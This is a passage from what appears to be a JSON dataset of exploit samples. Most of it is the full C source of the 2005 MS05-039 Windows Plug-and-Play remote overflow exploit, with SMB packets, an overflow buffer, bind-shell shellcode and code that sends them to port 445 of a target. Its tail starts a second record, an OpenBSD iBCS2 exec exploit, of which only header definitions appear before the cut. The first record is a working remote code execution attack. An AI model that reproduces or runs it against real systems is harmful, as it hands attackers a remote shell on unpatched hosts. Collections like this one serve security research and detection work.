=\n\n\t\"\\x00\\x00\\x00\\xDA\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x08\\x20\\x00\\x0C\\xFF\\x00\\xDA\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x57\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x9F\\x00\\x4E\"\n\n\t\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x46\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x47\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x06\\x00\\x06\\x00\\x40\"\n\n\t\"\\x00\\x00\\x00\\x10\\x00\\x10\\x00\\x47\\x00\\x00\\x00\\x15\\x8A\\x88\\xE0\\x48\"\n\n\t\"\\x00\\x4F\\x00\\x44\\x00\\x00\\xED\\x41\\x2C\\x27\\x86\\x26\\xD2\\x59\\xA0\\xB3\"\n\n\t\"\\x5E\\xAA\\x00\\x88\\x6F\\xC5\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\"\n\n\t\"\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\"\n\n\t\"\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\"\n\n\t\"\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\"\n\n\t\"\\x30\\x00\\x20\\x00\\x35\\x00\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_TreeConnectAndX[] =\n\n\t\"\\x00\\x00\\x00\\x5A\\xFF\\x53\\x4D\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x08\\x30\\x00\\x04\\xFF\\x00\\x5A\\x00\\x08\\x00\\x01\\x00\\x2F\\x00\\x00\";\n\n\n\n\n\n\n\nunsigned char SMB_TreeConnectAndX_[] =\n\n\t\"\\x00\\x00\\x3F\\x3F\\x3F\\x3F\\x3F\\x00\";\n\n\n\n\n\n/* browser */\n\nunsigned char SMB_PipeRequest_browser[] =\n\n\t\"\\x00\\x00\\x00\\x66\\xFF\\x53\\x4D\\x42\\xA2\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x40\\x00\\x18\\xFF\\x00\\xDE\\xDE\\x00\\x10\\x00\\x16\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x9F\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\n\n\t\"\\x02\\x00\\x00\\x00\\x03\\x13\\x00\\x00\\x5C\\x00\\x62\\x00\\x72\\x00\\x6F\\x00\"\n\n\t\"\\x77\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_PNPEndpoint[] =\n\n/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */\n\n\t\"\\x00\\x00\\x00\\x9C\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x50\\x00\\x10\\x00\\x00\\x48\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x48\\x00\\x54\\x00\\x02\"\n\n\t\"\\x00\\x26\\x00\\x00\\x40\\x59\\x00\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\n\n\t\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x0B\\x03\\x10\\x00\\x00\\x00\"\n\n\t\"\\x48\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xB8\\x10\\xB8\\x10\\x00\\x00\\x00\\x00\"\n\n\t\"\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x40\\x4E\\x9F\\x8D\\x3D\\xA0\\xCE\\x11\"\n\n\t\"\\x8F\\x69\\x08\\x00\\x3E\\x30\\x05\\x1B\\x01\\x00\\x00\\x00\\x04\\x5D\\x88\\x8A\"\n\n\t\"\\xEB\\x1C\\xC9\\x11\\x9F\\xE8\\x08\\x00\\x2B\\x10\\x48\\x60\\x02\\x00\\x00\\x00\";\n\n\n\n\n\n\n\nunsigned char RPC_call[] =\n\n\t\"\\x00\\x00\\x08\\x90\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x60\\x00\\x10\\x00\\x00\\x3C\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x3C\\x08\\x54\\x00\\x02\"\n\n\t\"\\x00\\x26\\x00\\x00\\x40\\x4D\\x08\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\n\n\t\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x00\\x03\\x10\\x00\\x00\\x00\"\n\n\t\"\\x3C\\x08\\x00\\x00\\x01\\x00\\x00\\x00\\x24\\x08\\x00\\x00\\x00\\x00\\x36\\x00\"\n\n\t\"\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x52\\x00\\x4F\\x00\"\n\n\t\"\\x4F\\x00\\x54\\x00\\x5C\\x00\\x53\\x00\\x59\\x00\\x53\\x00\\x54\\x00\\x45\\x00\"\n\n\t\"\\x4D\\x00\\x5C\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\xFF\\xFF\\x00\\x00\\xE0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\xC0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\n\n\t/* jmp over - entry point */\n\n\t\"\\xEB\\x08\\x90\\x90\"\n\n\n\n\t/* pop reg; pop reg; retn; - umpnpmgr.dll */\n\n\t\"\\x67\\x15\\x77\\x76\" /* 0x767a1567 */\n\n\n\n\t/* jmp ebx - umpnpmgr.dll (BROKEN)\n\n\t\"\\x6f\\x36\\x77\\x76\" */\n\n\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x08\\x90\\x90\\x48\\x4F\\x44\\x88\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";\n\n\n\n\n\nunsigned char RPC_call_end[] =\n\n\t\"\\xE0\\x07\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char bind_shellcode[] =\n\n\t\"\\x29\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x19\"\n\n\t\"\\xf5\\x04\\x37\\x83\\xeb\\xfc\\xe2\\xf4\\xe5\\x9f\\xef\\x7a\\xf1\\x0c\\xfb\\xc8\"\n\n\t\"\\xe6\\x95\\x8f\\x5b\\x3d\\xd1\\x8f\\x72\\x25\\x7e\\x78\\x32\\x61\\xf4\\xeb\\xbc\"\n\n\t\"\\x56\\xed\\x8f\\x68\\x39\\xf4\\xef\\x7e\\x92\\xc1\\x8f\\x36\\xf7\\xc4\\xc4\\xae\"\n\n\t\"\\xb5\\x71\\xc4\\x43\\x1e\\x34\\xce\\x3a\\x18\\x37\\xef\\xc3\\x22\\xa1\\x20\\x1f\"\n\n\t\"\\x6c\\x10\\x8f\\x68\\x3d\\xf4\\xef\\x51\\x92\\xf9\\x4f\\xbc\\x46\\xe9\\x05\\xdc\"\n\n\t\"\\x1a\\xd9\\x8f\\xbe\\x75\\xd1\\x18\\x56\\xda\\xc4\\xdf\\x53\\x92\\xb6\\x34\\xbc\"\n\n\t\"\\x59\\xf9\\x8f\\x47\\x05\\x58\\x8f\\x77\\x11\\xab\\x6c\\xb9\\x57\\xfb\\xe8\\x67\"\n\n\t\"\\xe6\\x23\\x62\\x64\\x7f\\x9d\\x37\\x05\\x71\\x82\\x77\\x05\\x46\\xa1\\xfb\\xe7\"\n\n\t\"\\x71\\x3e\\xe9\\xcb\\x22\\xa5\\xfb\\xe1\\x46\\x7c\\xe1\\x51\\x98\\x18\\x0c\\x35\"\n\n\t\"\\x4c\\x9f\\x06\\xc8\\xc9\\x9d\\xdd\\x3e\\xec\\x58\\x53\\xc8\\xcf\\xa6\\x57\\x64\"\n\n\t\"\\x4a\\xa6\\x47\\x64\\x5a\\xa6\\xfb\\xe7\\x7f\\x9d\\x1a\\x55\\x7f\\xa6\\x8d\\xd6\"\n\n\t\"\\x8c\\x9d\\xa0\\x2d\\x69\\x32\\x53\\xc8\\xcf\\x9f\\x14\\x66\\x4c\\x0a\\xd4\\x5f\"\n\n\t\"\\xbd\\x58\\x2a\\xde\\x4e\\x0a\\xd2\\x64\\x4c\\x0a\\xd4\\x5f\\xfc\\xbc\\x82\\x7e\"\n\n\t\"\\x4e\\x0a\\xd2\\x67\\x4d\\xa1\\x51\\xc8\\xc9\\x66\\x6c\\xd0\\x60\\x33\\x7d\\x60\"\n\n\t\"\\xe6\\x23\\x51\\xc8\\xc9\\x93\\x6e\\x53\\x7f\\x9d\\x67\\x5a\\x90\\x10\\x6e\\x67\"\n\n\t\"\\x40\\xdc\\xc8\\xbe\\xfe\\x9f\\x40\\xbe\\xfb\\xc4\\xc4\\xc4\\xb3\\x0b\\x46\\x1a\"\n\n\t\"\\xe7\\xb7\\x28\\xa4\\x94\\x8f\\x3c\\x9c\\xb2\\x5e\\x6c\\x45\\xe7\\x46\\x12\\xc8\"\n\n\t\"\\x6c\\xb1\\xfb\\xe1\\x42\\xa2\\x56\\x66\\x48\\xa4\\x6e\\x36\\x48\\xa4\\x51\\x66\"\n\n\t\"\\xe6\\x25\\x6c\\x9a\\xc0\\xf0\\xca\\x64\\xe6\\x23\\x6e\\xc8\\xe6\\xc2\\xfb\\xe7\"\n\n\t\"\\x92\\xa2\\xf8\\xb4\\xdd\\x91\\xfb\\xe1\\x4b\\x0a\\xd4\\x5f\\xf6\\x3b\\xe4\\x57\"\n\n\t\"\\x4a\\x0a\\xd2\\xc8\\xc9\\xf5\\x04\\x37\";\n\n\n\n#define SET_PORTBIND_PORT(buf, port) \\\n\n\t*(unsigned short *)(((buf)+186)) = (port)\n\n\n\n\n\nvoid\n\nconvert_name(char *out, char *name)\n\n{\n\n\tunsigned long len;\n\n\n\n\tlen = strlen(name);\n\n\tout += len * 2 - 1;\n\n\twhile (len--) {\n\n\t\t*out-- = '\\x00';\n\n\t\t*out-- = name[len];\n\n\t}\n\n}\n\n\n\n\n\n\n\nint\n\nmain (int argc, char **argv)\n\n{\n\n\tstruct sockaddr_in addr;\n\n\tstruct hostent *he;\n\n\tint len;\n\n\tint sockfd;\n\n\tunsigned short smblen;\n\n\tunsigned short bindport;\n\n\tunsigned char tmp[1024];\n\n\tunsigned char packet[4096];\n\n\tunsigned char *ptr;\n\n\tchar recvbuf[4096];\n\n\n\n#ifdef _WIN32\n\n\tWSADATA wsa;\n\n\tWSAStartup(MAKEWORD(2,0), &wsa);\n\n#endif\n\n\n\n\tprintf(\"\\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\\n\");\n\n\tprintf(\"\\t         Universal Exploit + no crash shellcode\\n\\n\");\n\n\tprintf(\"\\t         [Spanish hack by RoMaNSoFt :-)]\\n\\n\\n\");\n\n\tprintf(\"\\t            Copyright (c) 2005 .: houseofdabus :.\\n\\n\\n\");\n\n\n\n\n\n\tif (argc < 3) {\n\n\t\tprintf(\"%s <host> <bind port>\\n\", argv[0]);\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif ((he = gethostbyname(argv[1])) == NULL) {\n\n\t\tprintf(\"[-] Unable to resolve %s\\n\", argv[1]);\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\n\n\t\tprintf(\"[-] socket failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\taddr.sin_family = AF_INET;\n\n\taddr.sin_port = htons(445);\n\n\taddr.sin_addr = *((struct in_addr *)he->h_addr);\n\n\tmemset(&(addr.sin_zero), '\\0', 8);\n\n\n\n\n\n\n\n\tprintf(\"\\n[*] connecting to %s:445...\", argv[1]);\n\n\tif (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {\n\n\t\tprintf(\"\\n[-] connect failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\tprintf(\"ok\\n\");\n\n\n\n\tprintf(\"[*] null session...\");\n\n\tif (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif (len <= 10) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tptr = packet;\n\n\tmemcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);\n\n\tptr += sizeof(SMB_TreeConnectAndX)-1;\n\n\n\n\tsprintf(tmp, \"\\\\\\\\%s\\\\IPC$\", argv[1]);\n\n\tconvert_name(ptr, tmp);\n\n\tsmblen = strlen(tmp)*2;\n\n\tptr += smblen;\n\n\tsmblen += 9;\n\n\tmemcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);\n\n\n\n\tmemcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);\n\n\tptr += sizeof(SMB_TreeConnectAndX_)-1;\n\n\n\n\tsmblen = ptr-packet;\n\n\tsmblen -= 4;\n\n\tmemcpy(packet+3, &smblen, 1);\n\n\n\n\tif (send(sockfd, packet, ptr-packet, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] bind pipe...\");\n\n\n\n\tif (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] sending crafted packet...\");\n\n\n\n\t// nop\n\n\tptr = packet;\n\n\tmemset(packet, '\\x90', sizeof(packet));\n\n\n\n\t// header & offsets\n\n\tmemcpy(ptr, RPC_call, sizeof(RPC_call)-1);\n\n\tptr += sizeof(RPC_call)-1;\n\n\n\n\t// shellcode\n\n\tbindport = (unsigned short)atoi(argv[2]);\n\n\tbindport ^= 0x0437;\n\n\tSET_PORTBIND_PORT(bind_shellcode, htons(bindport));\n\n\tmemcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);\n\n\n\n\t// end of packet\n\n\tmemcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,\n\n\t\tRPC_call_end,\n\n\t\tsizeof(RPC_call_end)-1);\n\n\n\n\t// sending...\n\n\tif (send(sockfd, packet, 2196, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] check your shell on %s:%i\\n\", argv[1], atoi(argv[2]));\n\n\n\n\trecv(sockfd, recvbuf, 4096, 0);\n\n\n\nreturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-25]",
935        "vulnerable": true
936    },
937    {
938        "exploit_id": 118,
939        "content": "//\n\n// Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch\n\n//\n\n#include <sys/types.h>\n\n#include <sys/stat.h>\n\n#include <fcntl.h>\n\n#include <stdio.h>\n\n/* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */\n\n/* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */\n\n\n\n/*\n\n * Copyright (c) 1994, 1995 Scott Bartram\n\n * All rights reserved.\n\n *\n\n * adapted from sys/sys/exec_ecoff.h\n\n * based on Intel iBCS2\n\n *\n\n * Redistribution and use in source and binary forms, with or without\n\n * modification, are permitted provided that the following conditions\n\n * are met:\n\n * 1. Redistributions of source code must retain the above copyright\n\n * notice, this list of conditions and the following disclaimer.\n\n * 2. Redistributions in binary form must reproduce the above copyright\n\n * notice, this list of conditions and the following disclaimer in the\n\n * documentation and/or other materials provided with the distribution.\n\n * 3. The name of the author may not be used to endorse or promote products\n\n * derived from this software without specific prior written permission\n\n *\n\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n\n * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\n\n * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\n\n * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,\n\n * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT\n\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\n\n * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n */\n\n\n\n#ifndef _IBCS2_EXEC_H_\n\n#define _IBCS2_EXEC_H_\n\n\n\n/*\n\n * COFF file header\n\n */\n\n\n\nstruct coff_filehdr {\n\n    u_short f_magic; /* magic number */\n\n    u_short f_nscns; /* # of sections */\n\n    long f_timdat; /* timestamp */\n\n    long f_symptr; /* file offset of symbol table */\n\n    long f_nsyms; /* # of symbol table entries */\n\n    u_short f_opthdr; /* size of optional header */\n\n    u_short f_flags; /* flags */\n\n};\n\n\n\n/* f_magic flags */\n\n#define COFF_MAGIC_I386 0x14c\n\n\n\n/* f_flags */\n\n#define COFF_F_RELFLG 0x1\n\n#define COFF_F_EXEC 0x2\n\n#define COFF_F_LNNO 0x4\n\n#define COFF_F_LSYMS 0x8\n\n#define COFF_F_SWABD 0x40\n\n#define COFF_F_AR16WR 0x80\n\n#define COFF_F_AR32WR 0x100\n\n\n\n/*\n\n * COFF system header\n\n */\n\n\n\nstruct coff_aouthdr {\n\n    short a_magic;\n\n    short a_vstamp;\n\n    long a_tsize;\n\n    long a_dsize;\n\n    long a_bsize;\n\n    long a_entry;\n\n    long a_tstart;\n\n    long a_dstart;\n\n};\n\n\n\n/* magic */\n\n#define COFF_OMAGIC 0407 /* text not write-protected; data seg\n\nis contiguous with text */\n\n#define COFF_NMAGIC 0410 /* text is write-protected; data starts\n\nat next seg following text */\n\n#define COFF_ZMAGIC 0413 /* text and data segs are aligned for\n\ndirect paging */\n\n#define COFF_SMAGIC 0443 /* shared lib */\n\n\n\n/*\n\n * COFF section header\n\n */\n\n\n\nstruct coff_scnhdr {\n\n    char s_name[8];\n\n    long s_paddr;\n\n    long s_vaddr;\n\n    long s_size;\n\n    long s_scnptr;\n\n    long s_relptr;\n\n    long s_lnnoptr;\n\n    u_short s_nreloc;\n\n    u_short s_nlnno;\n\n    long s_flags;\n\n};\n\n\n\n/* s_flags */\n\n#define COFF_STYP_REG 0x00\n\n#define COFF_STYP_DSECT 0x01\n\n#define COFF_STYP_NOLOAD 0x02\n\n#define COFF_STYP_GROUP 0x04\n\n#define COFF_STYP_PAD 0x08\n\n#define COFF_STYP_COPY 0x10\n\n#define COFF_STYP_TEXT 0x20\n\n#define COFF_STYP_DATA 0x40\n\n#define COFF_STYP_BSS 0x80\n\n#define COFF_STYP_INFO 0x200\n\n#define COFF_STYP_OVER 0x400\n\n#define COFF_STYP_SHLIB 0x800\n\n\n\n/*\n\n * COFF shared library header\n\n */\n\n\n\nstruct coff_slhdr {\n\nlong entry_len; /* in words */\n\nlong path_index; /* in words */\n\nchar sl_name[1];\n\n};\n\n\n\n#define COFF_ROUND(val, by) (((val) + by - 1) & ~(by - 1))\n\n\n\n#define COFF_ALIGN(a) ((a) & ~(COFF_LDPGSZ - 1))\n\n\n\n#define COFF_HDR_SIZE \\\n\n(sizeof(struct coff_filehdr) + sizeof(struct coff_aouthdr))\n\n\n\n#define COFF_BLOCK_ALIGN(ap, value) \\\n\n        (ap->a_magic == COFF_ZMAGIC ? COFF_ROUND(value, COFF_LDPGSZ) : \\\n\n         value)\n\n\n\n#define COFF_TXTOFF(fp, ap) \\\n\n        (ap->a_magic == COFF_ZMAGIC ? 0 : \\\n\n         COFF_ROUND(COFF_HDR_SIZE + fp->f_nscns * \\\n\nsizeof(struct coff_scnhdr), COFF_SEGMENT_ALIGNMENT(ap)))\n\n\n\n#define COFF_DATOFF(fp, ap) \\\n\n        (COFF_BLOCK_ALIGN(ap, COFF_TXTOFF(fp, ap) + ap->a_tsize))\n\n\n\n#define COFF_SEGMENT_ALIGN(ap, value) \\\n\n        (COFF_ROUND(value, (ap->a_magic == COFF_ZMAGIC ? COFF_LDPGSZ : \\\n\n         COFF_SEGMENT_ALIGNMENT(ap))))\n\n\n\n#define COFF_LDPGSZ 4096\n\n\n\n#define COFF_SEGMENT_ALIGNMENT(ap) 4\n\n\n\n#define COFF_BADMAG(ex) (ex->f_magic != COFF_MAGIC_I386)\n\n\n\n#define IBCS2_HIGH_SYSCALL(n) (((n) & 0x7f) == 0x28)\n\n#define IBCS2_CVT_HIGH_SYSCALL(n) (((n) >> 8) + 128)\n\n\n\nstruct exec_package;\n\nint exec_ibcs2_coff_makecmds(struct proc *, struct exec_package *);\n\n\n\n/*\n\n * x.out (XENIX)\n\n */\n\n\n\nstruct xexec {\n\nu_short x_magic; /* magic number */\n\nu_short x_ext; /* size of extended header */\n\nlong x_text; /* ignored */\n\nlong x_data; /* ignored */\n\nlong x_bss; /* ignored */\n\nlong x_syms; /* ignored */\n\nlong x_reloc; /* ignored */\n\nlong x_entry; /* executable entry point */\n\nchar x_cpu; /* processor type */\n\nchar x_relsym; /* ignored */\n\nu_short x_renv; /* flags */\n\n};\n\n\n\n/* x_magic flags */\n\n#define XOUT_MAGIC 0x0206\n\n\n\n/* x_cpu flags */\n\n#define XC_386 0x004a /* 386, word-swapped */\n\n\n\n/* x_renv flags */\n\n#define XE_V5 0xc000\n\n#define XE_SEG 0x0800\n\n#define XE_ABS 0x0400\n\n#define XE_ITER 0x0200\n\n#define XE_VMOD 0x0100\n\n#define XE_FPH 0x0080\n\n#define XE_LTEXT 0x0040\n\n#define XE_LDATA 0x0020\n\n#define XE_OVER 0x0010\n\n#define XE_FS 0x0008\n\n#define XE_PURE 0x0004\n\n#define XE_SEP 0x0002\n\n#define XE_EXEC 0x0001\n\n\n\n/*\n\n * x.out extended header\n\n */\n\n\n\nstruct xext {\n\nlong xe_trsize; /* ignored */\n\nlong xe_drsize; /* ignored */\n\nlong xe_tbase; /* ignored */\n\nlong xe_dbase; /* ignored */\n\nlong xe_stksize; /* stack size if XE_FS set in x_renv */\n\nlong xe_segpos; /* offset of segment table */\n\nlong xe_segsize; /* segment table size */\n\nlong xe_mdtpos; /* ignored */\n\nlong xe_mdtsize; /* ignored */\n\nchar xe_mdttype; /* ignored */\n\nchar xe_pagesize; /* ignored */\n\nchar xe_ostype; /* ignored */\n\nchar xe_osvers; /* ignored */\n\nu_short xe_eseg; /* ignored */\n\nu_short xe_sres; /* ignored */\n\n};\n\n\n\n/*\n\n * x.out segment table\n\n */\n\n\n\nstruct xseg {\n\nu_short xs_type; /* segment type */\n\nu_short xs_attr; /* attribute flags */\n\nu_short xs_seg; /* segment selector number */\n\nchar xs_align; /* ignored */\n\nchar xs_cres; /* ignored */\n\nlong xs_filpos; /* offset of this segment */\n\nlong xs_psize; /* physical segment size */\n\nlong xs_vsize; /* virtual segment size */\n\nlong xs_rbase; /* relocation base address */\n\nu_short xs_noff; /* ignored */\n\nu_short xs_sres; /* ignored */\n\nlong xs_lres; /* ignored */\n\n};\n\n\n\n/* xs_type flags */\n\n#define XS_TNULL 0 /* unused */\n\n#define XS_TTEXT 1 /* text (read-only) */\n\n#define XS_TDATA 2 /* data (read-write) */\n\n#define XS_TSYMS 3 /* symbol table (noload) */\n\n#define XS_TREL 4 /* relocation segment (noload) */\n\n#define XS_TSESTR 5 /* string table (noload) */\n\n#define XS_TGRPS 6 /* group segment (noload) */\n\n\n\n#define XS_TIDATA 64\n\n#define XS_TTSS 65\n\n#define XS_TLFIX 66\n\n#define XS_TDNAME 67\n\n#define XS_TDTEXT 68\n\n#define XS_TDFIX 69\n\n#define XS_TOVTAB 70\n\n#define XS_T71 71\n\n#define XS_TSYSTR 72\n\n\n\n/* xs_attr flags */\n\n#define XS_AMEM 0x8000 /* memory image */\n\n#define XS_AITER 0x0001 /* iteration records */\n\n#define XS_AHUGE 0x0002 /* unused */\n\n#define XS_ABSS 0x0004 /* uninitialized data */\n\n#define XS_APURE 0x0008 /* read-only (sharable) segment */\n\n#define XS_AEDOWN 0x0010 /* expand down memory segment */\n\n#define XS_APRIV 0x0020 /* unused */\n\n#define XS_A32BIT 0x0040 /* 32-bit text/data */\n\n\n\n/*\n\n * x.out iteration record\n\n */\n\n\n\nstruct xiter {\n\nlong xi_size; /* text/data size 